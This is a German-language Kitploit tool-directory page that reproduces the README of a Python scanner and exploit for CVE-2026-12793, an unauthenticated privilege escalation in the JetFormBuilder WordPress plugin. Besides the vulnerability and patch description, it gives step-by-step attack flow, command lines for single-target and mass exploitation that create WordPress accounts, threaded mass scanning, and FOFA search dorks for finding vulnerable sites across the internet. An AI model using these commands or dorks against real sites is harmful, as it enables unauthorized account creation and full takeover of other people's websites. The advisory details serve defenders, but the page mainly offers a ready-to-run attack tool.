Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-12793 — Python-PoC-Scanner und Exploit für CVE-2026-12793, eine unauthentifizierte Rechteausweitung in JetFormBuilder <=3.6.2, die WordPress-Admin-Konten erstellt. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-12793
Privilege EscalationAufklärungSchwachstellenscannerSchwachstellenanalyseExploitationScripting & AutomatisierungWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubmurrez/cve-2026-12793
vor 11h 13mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-12793

Python-PoC-Scanner und Exploit für CVE-2026-12793, eine unauthentifizierte Rechteausweitung in JetFormBuilder <=3.6.2, die WordPress-Admin-Konten erstellt.

Repository anzeigen

CVE-2026-12793 — JetFormBuilder Unauthentifizierte Rechteausweitung

Proof-of-Concept-Scanner und Exploit für CVE-2026-12793 im WordPress-Plugin JetFormBuilder — Dynamic Blocks Form Builder (Crocoblock).

CVECVE-2026-12793
Pluginjetformbuilder
Betroffen≤ 3.6.2
Behoben in3.6.2.1+
CVSS9.8 Kritisch
AuthUnauthentifiziert
CWECWE-269 — Unsachgemäße Rechteverwaltung
Forscherdaroo (Wordfence)

Schwachstelle

Das Plugin überprüft nicht, ob _jet_engine_booking_form_id auf einen veröffentlichten Custom Post Type jet-form-builder verweist, bevor der Blockinhalt des referenzierten Beitrags als Formularschema geladen und Post-Submit-Aktionen ausgeführt werden.

Ein unauthentifizierter Angreifer kann eine manipulierte AJAX-Anfrage senden, um die Aktion Register User (wp_insert_user) auszulösen und ein neues WordPress-Konto zu erstellen. Wenn das Zielformular mit einer erhöhten Rolle (z. B. administrator) fehlkonfiguriert ist, führt dies zur vollständigen Übernahme der Website.

Angriffsablauf

root@kitploit:~
1. Detect JetFormBuilder + version ≤ 3.6.2 (readme.txt)
2. Discover form ID from public pages (data-form-id, /register/, etc.)
3. POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4. Register User action runs → new WP user created

Patch (3.6.2.1)

  • Block_Helper::is_valid_form_post() — nur veröffentlichte jet-form-builder CPT akzeptiert
  • Form_Handler::set_form_id() lehnt ungültige Formular-IDs ab
  • SSR-Validierungshärtung (wp_insert_user / wp_update_user als Callbacks blockiert)

Anforderungen

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests urllib3

Verwendung

Einzelnes Ziel — Prüfung

root@kitploit:~
python poc.py -u https://target.example --mode check

Massenscan

root@kitploit:~
python poc.py --list domains.txt --mode check --threads 30 --quiet

Eingabeformate: eine Domain/URL pro Zeile, FOFA CSV (host,domain) oder candidates.jsonl aus einem vorherigen Lauf.

Exploit (einzelnes Ziel)

root@kitploit:~
python poc.py -u https://target.example --mode exploit \
  --form-id 1858 \
  --page-url /register/ \
  --fields login=cadastro_nome,email=cadastro_mail,password=cadastro_senha \
  --username myuser \
  --email [email protected] \
  --password 'SecurePass123!' \
  --verify

Massen-Exploit aus Kandidaten

root@kitploit:~
python poc.py --list candidates.jsonl --mode exploit --threads 10 --verify

Optionen

Ausgabedateien

DateiInhalt
hits.txt

Beispiel-Kandidateneintrag

root@kitploit:~
{
  "target": "https://target.example",
  "version": "3.3.3",
  "form_id": 1858,
  "page_url": "https://target.example/register/",
  "fields": {
    "login": "user_login",
    "email": "user_email",
    "password": "user_pass"
  }
}

Automatisch erkannte Feldnamen sind heuristisch. Vor dem Exploit immer mit --fields überprüfen und überschreiben.

Erkennung / FOFA-Dorks

root@kitploit:~
body="/wp-content/plugins/jetformbuilder/"
body="jet-form-builder" && body="wp-content"
header="/wp-content/plugins/jetformbuilder/"
title="WordPress" && body="data-form-id"

Versionsprüfung:

root@kitploit:~
/wp-content/plugins/jetformbuilder/readme.txt

Achten Sie auf Stable tag: ≤ 3.6.2.

Referenzen

  • NVD — CVE-2026-12793
  • Wordfence Threat Intel
  • Patchstack
  • WordPress.org changeset
  • GitHub fix commit

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisiertes Sicherheitstesting und Bildungszwecke bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal. Die Autoren übernehmen keine Haftung für Missbrauch.

Lizenz

MIT

Tool herunterladen
FlagBeschreibung
-u, --urlEinzelne Ziel-URL
--listZieldatei
--modecheck (Standard) oder exploit
--form-idBekannte JetFormBuilder-Formular-Post-ID
--page-urlSeite, die das Formular einbettet (Referer), z. B. /register/
--fieldsFeldzuordnung: login=x,email=y,password=z
--pathsZusätzliche Pfade zum Crawlen nach Formularen
--username / --email / --passwordAnmeldedaten für Exploit (zufällig, falls weggelassen)
--verifyKonto nach dem Absenden über wp-login.php verifizieren
-j, --threadsWorker-Threads (Standard: 20)
--timeoutHTTP-Timeout in Sekunden (Standard: 20)
--proxyHTTP(S)-Proxy-URL
--outputVollständiges JSONL-Log (Standard: cve_2026_12793_results.jsonl)
--vuln-listTrefferliste (Standard: hits.txt)
--candidates-listKandidaten-JSONL (Standard: candidates.jsonl)
-q, --quietNur Fortschrittsausgabe
Verwundbare / exploitierte Ziel-URLs
candidates.jsonlZiele mit erreichbarer Register-User-Sonde (form_id, page_url, fields)
cve_2026_12793_results.jsonlVollständige JSON-Ergebnisse pro Ziel